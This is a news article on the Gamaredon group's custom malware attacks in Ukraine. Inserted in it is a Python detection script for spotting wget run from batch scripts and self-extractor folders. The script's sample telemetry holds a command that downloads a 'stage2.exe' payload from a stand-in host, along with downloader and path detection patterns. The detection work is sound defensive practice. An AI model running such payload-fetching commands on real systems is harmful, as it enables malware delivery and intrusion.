“Gamaredon” Group Uses Custom Malware in Ukraine Attacks

A Russia-linked threat group tracked as “Gamaredon” has been using custom-developed malware in attacks aimed at Ukraine, Palo Alto Networks reported on Monday.

The group has been active since at least mid-2013, but its activities were first detailed in April 2015 by LookingGlass. The security firm’s analysis focused on Operation Armageddon, a cyber espionage campaign targeting Ukrainian government, military and law enforcement officials.

The Security Service of Ukraine (SBU) issued a statement at the time attributing the attacks to branches of Russia's Federal Security Service (FSB). Furthermore, evidence found by researchers suggested that the malware used by the threat actor had been built on a Russian operating system.

In the attacks analyzed by LookingGlass in 2015, the Gamaredon group used spear-phishing emails to deliver common remote access tools (RATs), such as Remote Manipulator System (RMS) and UltraVNC.

According to Palo Alto Networks, Gamaredon has started using new, custom-built malware instead of the widely available RATs. However, it’s unclear if the latest attacks are also part of Operation Armageddon or if they represent a new campaign.

The new pieces of malware used by the group are capable of downloading and executing additional payloads, scanning infected systems for specific files, capturing screenshots, and executing remote commands. While the actor’s older tools were easily identified by antimalware products (e.g. TROJ_GAMAREDON, Trojan.Gamaredon), its new creations often go undetected or unrecognized.

“We believe this is likely due to the modular nature of the malware, the malware’s heavy use of batch scripts, and the abuse of legitimate applications and tools (such as wget) for malicious purposes,” said Palo Alto Networks researchers.

One of the custom backdoors used by Gamaredon is Pteranodon, which can capture screenshots, download and execute files, and execute commands on the system.

While Gamaredon has started using new malware, it still relies on self-extracting archives (SFX) and much of the same infrastructure as when its activities were first analyzed.
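The evasion pattern described above (batch scripts driving a legitimate downloader such as wget, with payloads unpacked from self-extracting archives) is something a defender can hunt for in process-creation telemetry. The script below is an added illustration of that hunt, not code from the article or from Palo Alto Networks: it walks a process tree and flags a downloader tool whose ancestry includes a cmd.exe running a .bat file or an image executing from a self-extractor's temporary directory. The `ProcessEvent` records, the `DOWNLOADER_TOOLS` set, the `SFX_MARKERS` path fragments and the sample events are all constructed assumptions for the example.

```python
import os
from dataclasses import dataclass
from typing import Dict, List

@dataclass(frozen=True)
class ProcessEvent:
    """One process-creation record (constructed shape, not a real EDR schema)."""
    pid: int
    ppid: int
    image: str     # full path of the executable
    cmdline: str   # command line as logged

# Legitimate tools the article notes being abused; extend per environment (assumption).
DOWNLOADER_TOOLS = {"wget.exe"}

# Path fragments typical of WinRAR / 7-Zip self-extractor staging directories
# (pattern list is an assumption for this example).
SFX_MARKERS = ("\\rarsfx", "\\7zipsfx")

# Constructed sample telemetry, not real captured events.
SAMPLE_EVENTS = [
    ProcessEvent(100, 1,   r"C:\Windows\explorer.exe", "explorer.exe"),
    # SFX stub launched from Temp, which then runs a batch script via cmd.exe
    ProcessEvent(200, 100, r"C:\Users\u\AppData\Local\Temp\report.exe", "report.exe"),
    ProcessEvent(300, 200, r"C:\Windows\System32\cmd.exe",
                 r"cmd.exe /c C:\Users\u\AppData\Local\Temp\RarSFX0\run.bat"),
    ProcessEvent(400, 300, r"C:\Users\u\AppData\Local\Temp\RarSFX0\wget.exe",
                 "wget.exe -q http://example.invalid/stage2 -O stage2.exe"),
    # Benign noise: an interactive cmd.exe and wget from a normal install location
    ProcessEvent(500, 100, r"C:\Windows\System32\cmd.exe", "cmd.exe /c dir"),
    ProcessEvent(600, 100, r"C:\Program Files\Git\usr\bin\wget.exe",
                 "wget.exe https://example.invalid/tool.zip"),
]

def basename(path: str) -> str:
    """Lower-cased file name regardless of Windows or POSIX separators."""
    return os.path.basename(path.replace("\\", "/")).lower()

def ancestors(event: ProcessEvent, by_pid: Dict[int, ProcessEvent]) -> List[ProcessEvent]:
    """Parent chain from the immediate parent upwards; guards against pid cycles."""
    chain: List[ProcessEvent] = []
    seen = set()
    cur = by_pid.get(event.ppid)
    while cur is not None and cur.pid not in seen:
        seen.add(cur.pid)
        chain.append(cur)
        cur = by_pid.get(cur.ppid)
    return chain

def analyze(events: List[ProcessEvent]) -> List[dict]:
    """Return one finding per downloader-tool process with suspicious ancestry."""
    by_pid = {e.pid: e for e in events}
    findings = []
    for e in events:
        if basename(e.image) not in DOWNLOADER_TOOLS:
            continue
        chain = ancestors(e, by_pid)
        reasons = []
        # Heavy batch-script use: a cmd.exe ancestor whose command line names a .bat file
        if any(basename(a.image) == "cmd.exe" and ".bat" in a.cmdline.lower() for a in chain):
            reasons.append("launched from batch script")
        # SFX staging: the tool itself or an ancestor runs from a self-extractor temp dir
        if any(m in p.image.lower() for p in chain + [e] for m in SFX_MARKERS):
            reasons.append("runs from self-extractor temp directory")
        if reasons:
            findings.append({"pid": e.pid, "image": e.image, "reasons": reasons})
    return findings

if __name__ == "__main__":
    for f in analyze(SAMPLE_EVENTS):
        print(f)
```

Only the wget instance spawned under the batch script inside the RarSFX0 directory is reported; the copy of wget under the Git install, launched directly from explorer.exe, is left alone. In practice the tool list and the SFX path markers should be tuned to the environment, and the ancestry walk is the part worth keeping: the individual binaries are legitimate, so the signal lies in how they are chained together.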

Russia-linked threat groups have been blamed for several campaigns targeting Ukrainian organizations, including damaging attacks on the country’s energy sector.

Related: Experts Doubt Russia Used Malware to Track Ukrainian Troops

Related: Ukrainian Group Claims Hack of Putin Advisor's Email

Related: Ukraine Power Grid Attacks Part of a 2-Year Campaign

Eduard Kovacs (@EduardKovacs) is a contributing editor at SecurityWeek. He worked as a high school IT teacher for two years before starting a career in journalism as Softpedia’s security news reporter. Eduard holds a bachelor’s degree in industrial informatics and a master’s degree in computer techniques applied in electrical engineering.